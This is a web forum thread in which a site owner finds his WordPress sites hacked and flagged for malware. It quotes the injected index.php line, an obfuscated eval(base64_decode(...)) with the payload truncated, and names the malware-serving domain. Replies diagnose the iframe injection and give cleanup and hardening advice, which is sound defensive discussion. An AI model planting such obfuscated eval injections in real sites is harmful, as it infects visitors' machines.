SitePoint Sponsor

User Tag List

Results 1 to 14 of 14
  1. #1
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Uh oh..host hacked?

    So guys I host about 10 websites on my hosting account. I havent touched ANY of these websites in at least 2 months max and I went to visit one today in Chrome and get this message:

    "Warning: Something's Not Right Here!
    s*****.com contains content from asugzhivbf.co.tv, a site known to distribute malware. Your computer might catch a virus if you visit this site."

    I was confused...this is my website. So I quickly did what anyone would do, and tried visiting another one of my websites, which also gave me the same warning. AND another. I checked 4 out of the 10 and all gave the same warning.

    So I'm wondering WHAT could have happened and what I should do from this point.

    None of my websites had illegal content, or stolen content. All unique, payed for scripts, templates, etc.

    Currently running a virus scan on my computer.

  2. #2
    SitePoint Wizard bronze trophy Immerse's Avatar
    Join Date
    Mar 2006
    Location
    Netherlands
    Posts
    1,661
    Mentioned
    7 Post(s)
    Tagged
    1 Thread(s)
    Use FTP to download the index page of one of those sites from your server, and then open it in your HTML editor to view the content (be very careful it doesn't get opened in your browser!).

    Perhaps some code has been added to the page? Or some evil hacker/ script kiddy has altered the code in it?

  3. #3
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Immerse,

    Thanks for the response!

    All my sites use Wordpress! So I downloaded via FTP the index.php for one website and opened it in notepad++ (sandboxed)

    On the FTP side none of the files have upload dates since a couple months ago when I last touched it.

    But in the index.php this was all that was in it, I'm not sure if this is normal for a wordpress index.php

    Code:
    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFI.........FtZT48L2Rpdj4nOw0KfQ=='));
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>
    Again I'm getting these errors of many of my websites that I own, so whatever it is (or whoever) must know each website I own. Which would lead me to think they know my Host account login. But again, on the FTP side the last activity for anything was the last time I touched it months ago.

    Edit: I have the original Wordpress theme I bought for the website I downloaded the index.php from above. This theme I bought from Themeforest. Since I have the theme saved to my documents, I checked its index.php. The original index.php goes like this:

    Code:
    <?php get_header(); ?>
    
    	
    <div id="slider-wrapper">
    	<div id="slider-inner" class="container_24">
    		
    		<ul id="slider" class="grid_24 omega alpha">
    		
    		<?php
    		$projects = kiss_projects(); // Default limit is 5
    		$image_w = get_option(KISS.'_project_slthumb_w');
            $image_h = get_option(KISS.'_project_slthumb_h');
    		$i=1;
    		foreach( $projects as $project ) {
    			
    			$prodesc = get_post_meta($project["ID"], "_project_desc", true);
    			$prodesc_type = get_post_meta($project["ID"], "_project_type", true);
    			
    			switch ($prodesc_type) {
    			
    				case "Default" : 
    		
    		?>
    		
    		  <li class="panel<?php echo $i ?>">
    		   <div class="textSlide slideContent">
    		    <a href="<?php echo get_permalink($project["ID"]) ?>"><?php get_image("post_ID=".$project["ID"]."&width=".$image_w."&height=".$image_h."&class=featureImage"); ?></a>
    		    <div class="leftFeature grid_11">
    			    <h2><a href="<?php echo get_permalink($project["ID"]) ?>"><?php echo $project["post_title"] ?></a></h2>
    			    <p><?php echo $prodesc ?></p>
    			    <div class="btn orange"><a href="<?php echo get_permalink($project["ID"]) ?>" title="View more"><span>View more</span></a></div>
    		   </div>
    		   </div>
    		  </li>
    		  
    		<?php 
    				break;
    				case "Image" :
    			
    		?>
    		
    		  <li class="panel<?php echo $i ?>">
    			<div class="imageSlide slideContent">
    		 		<?php get_image("post_ID=".$project["ID"]."&width=948&height=247&class=featureImage"); ?>
    		 		<a class="featureObg" href="<?php echo get_permalink($project["ID"]) ?>" title="<?php echo $project["post_title"] ?>"></a>
    		 	</div>
    		  </li>
    		
    		<?php			
    				break;
    			}
    			
    			$i++;
    		
    		} ?>
    		  
    		 </ul>
    		
    	</div>
    </div>
    
    
    <!-- BEGIN main_container_wrapper -->
    <div id="main_container_wrapper"> 
      
      <!-- BEGIN main_container -->
      <div id="main_container" class="container_24"> 
      
      	<?php 
      	
      	if(get_option(KISS."_opt_homepage_style")=="bustyle") {
      		
      		include(TEMPLATEPATH . '/template-home-2.php');
      		
      	} else {
      	
      		include(TEMPLATEPATH . '/template-home-1.php');
      		
      	}
      	?>
        
        
      </div>
      <!-- BEGIN main_container -->
      <div class="clear"></div>
    </div>
    <!-- END main_container_wrapper -->
    
    <?php get_footer(); ?>
    Last edited by Mittineague; Feb 1, 2014 at 14:41.

  4. #4
    From space with love silver trophy
    SpacePhoenix's Avatar
    Join Date
    May 2007
    Location
    Poole, UK
    Posts
    5,072
    Mentioned
    103 Post(s)
    Tagged
    0 Thread(s)
    Are all of the sites hosted on the same server or are the ones that have been hacked on a separate server?

    Are they on a dedicated server or shared hosting?
    Community Team Advisor
    Forum Guidelines: Posting FAQ Signatures FAQ Self Promotion FAQ
    Help the Mods: What's Fluff? Report Fluff/Spam to a Moderator

  5. #5
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    SpacePhoenix,

    They are all on the same host, plan with unlimited domains allowed. Got about 10 domains on this one host. So I'm pretty sure its all on the same server.

    I'm not too sure what im looking for but I was browsing some logs and what not on the Hostgator CP and saw a few "fishy" looking things.

    In the "error logs" section it listed these errors (some things *** out by me)

    Code:
    [Sun Aug 14 16:45:57 2011] [error] [client 67.195.110.173] (13)Permission denied: file permissions deny server access: /home/******/public_html/****.COM/.ftpquota
    [Sun Aug 14 15:58:19 2011] [error] [client 124.115.1.66] File does not exist: /home/***********/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
    [Sun Aug 14 15:58:18 2011] [error] [client 124.115.1.66] File does not exist: /home/************/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
    [Sun Aug 14 15:50:53 2011] [error] [client 89.123.45.34] File does not exist: /home/*********/public_html/game***/forums/60;URL=online.php
    [Sun Aug 14 15:50:09 2011] [error] [client 89.123.45.34] attempt to invoke directory as script: /home/*****/public_html/game***/cgi-bin/
    [Sun Aug 14 15:50:08 2011] [error] [client 89.123.45.34] (13)Permission denied: file permissions deny server access: /home/******/public_html/game***/.ftpquota
    Also under visitors for one of the websites I saw in the last 300, a bunch of visits to certain folders and directories of my theme by a user agent called "Java/1.6.0_04" all from an IP in romania.

    Not sure if any of this ^^ could mean something or it's nothing.

  6. #6
    SitePoint Wizard bronze trophy Immerse's Avatar
    Join Date
    Mar 2006
    Location
    Netherlands
    Posts
    1,661
    Mentioned
    7 Post(s)
    Tagged
    1 Thread(s)
    Yeah, it's that first line. It writes an iframe which loads a page from some weird URL which wants to download some evil stuff onto your PC.

    What to do now?

    1) change all your passwords related to your hosting (FTP, cPanel, MySQL etc).
    2) upload a fresh copy of index.php to each site or, even better, fresh WordPress installs (although that might take some work to get your sites working again with all plugins etc.). You can probably leave the databases in place, they generally don't tend to get updated with this kind of attack.

  7. #7
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Immerse View Post
    Yeah, it's that first line. It writes an iframe which loads a page from some weird URL which wants to download some evil stuff onto your PC.

    What to do now?

    1) change all your passwords related to your hosting (FTP, cPanel, MySQL etc).
    2) upload a fresh copy of index.php to each site or, even better, fresh WordPress installs (although that might take some work to get your sites working again with all plugins etc.). You can probably leave the databases in place, they generally don't tend to get updated with this kind of attack.
    Immerse,

    Thanks I will go through and do that now with all the websites.

    And out of curiosity, how does the "hacker" do something like this? Not looking for a play by play, but do they log into my FTP and download or inject it?

  8. #8
    SitePoint Wizard bronze trophy Immerse's Avatar
    Join Date
    Mar 2006
    Location
    Netherlands
    Posts
    1,661
    Mentioned
    7 Post(s)
    Tagged
    1 Thread(s)
    To be honest, I have no idea at all. Perhaps a vulnerability in WordPress? Perhaps they hacked a different account on the server? Maybe they brute-forced their way into your FTP account?

    Maybe someone else has more knowledge about how this is done...

  9. #9
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I just went ahead and wiped EVERYTHING. All sub directories on the server, removed all mySQL databases, etc.

    I haven't touched any of those websites in months. They're new versions of WP out too which I noticed, so that might have been a big issues. A blank slate is better, at least I can re-do everything with more security in mind.

    Thanks for the help guys!

  10. #10
    It's all Geek to me silver trophybronze trophy
    ralph.m's Avatar
    Join Date
    Mar 2009
    Location
    Melbourne, AU
    Posts
    24,319
    Mentioned
    462 Post(s)
    Tagged
    8 Thread(s)
    Off Topic:

    This is not an accessibility / usaqbility issue, so moved to the web security forum.

  11. #11
    SitePoint Enthusiast
    Join Date
    May 2011
    Posts
    35
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by cluongo View Post
    And out of curiosity, how does the "hacker" do something like this? Not looking for a play by play, but do they log into my FTP and download or inject it?
    It is usually one of two:
    1) Stealing your FTP credentials (usually using a Trojan on your PC) and then uploading a new index.php
    2) Stealing/guessing your WP admin password and editing index.php

    So two more suggestions:
    1) Scan your PC for viruses
    2) Change your WP admin password

    Sometimes it might be one of your WP plugins that is vulnerable to injection attacks that allow modifying files. So make sure your WP and plugins are up to date with the most recent version.
    Incapsula:
    Maximum Security and Performance for any Web Site - FREE Signup

  12. #12
    SitePoint Author silver trophybronze trophy
    wwb_99's Avatar
    Join Date
    May 2003
    Location
    Washington, DC
    Posts
    10,653
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    Lots of other vectors:

    3) Used an insecurely configured plugin or old version of wordpress to overwrite index.php
    4) Used a vulnerability in someone else's site on the same server to overwrite your index.php

    Once they've got one file in there, they are golden -- they should be able to overwrite and update anything they want.

  13. #13
    SitePoint Addict
    Join Date
    Apr 2009
    Posts
    358
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    I had a similar attack on a shared hosting account, one that I'd done nothing with for a year or two. You should check index.php in subdirectories, also check any .js files. In my case numerous files got the hack line added, not just the site index file. Using FTP I spotted the other files by looking at the file modification date.
    Doug G
    =====
    "If you ain't the lead dog, the view is always the same - Anon

  14. #14
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks for the replies guys. Sucks when it happens but it's a good lesson. I'll definitely have a bigger emphasis on security in future websites on on my regular PC desktop.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •